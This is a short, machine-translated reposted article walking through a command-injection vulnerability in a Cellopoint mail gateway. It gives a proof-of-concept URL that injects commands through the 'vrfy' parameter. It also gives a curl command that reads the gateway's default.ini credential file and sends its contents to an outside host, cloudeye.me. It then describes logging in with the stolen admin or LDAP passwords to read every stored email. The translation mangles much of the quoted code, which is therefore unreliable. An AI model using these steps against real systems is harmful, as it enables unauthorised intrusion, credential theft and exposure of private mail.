Shulou(Shulou.com)06/01 Report--

This article will explain in detail the example analysis of arbitrary command execution loopholes in the cellopoint mail gateway. The content of the article is of high quality, so the editor will share it with you for reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Zend decryption

The test found that there was a command execution in the gw_x_vrfy_n_test.php file in the reporter directory:

$email = $_ GET ["email"]; $vrfy = $_ GET ["vrfy"]

$file = (isset ($_ GET ["file"])? $_ GET ["file"]: $ini_default)

$debugFile = "/ tmp/vrfy-test.err"; $cmd = $GLOBALS ["TopFileRoot"]. "smtpd/celloauth-v". . "- n $vrfy-d 2 > debugFile"

Exec ($cmd, $output, $ret)

$lines = @ file ($debugFile)

Construct POC:gw_x_vrfy_n_test.php?vrfy=;$cmd within URL

This vulnerability can be exploited to execute commands (nobody privileges).

Check and find the / usr/local/mozart/smtpd/default.ini file to save the email administrator, ldap and other account password information.

Construct the following sed command (read the single-line contents of the target file through the sed command):

Curl%20-k%20 https://cloudeye.me/?info=$(sed%20-n%20 §3 §p%20/usr/local/mozart/smtpd/default.ini)

By consulting the web log information of a remote server, such as cloudeye.me

Echo to get the contents of the default.ini file, get the password of the mail archiving administrator admin or the configured ldap password, and visit $ip/report/login.php to log in to check all the email contents.

About the cellopoint mail gateway arbitrary command execution loophole party example analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.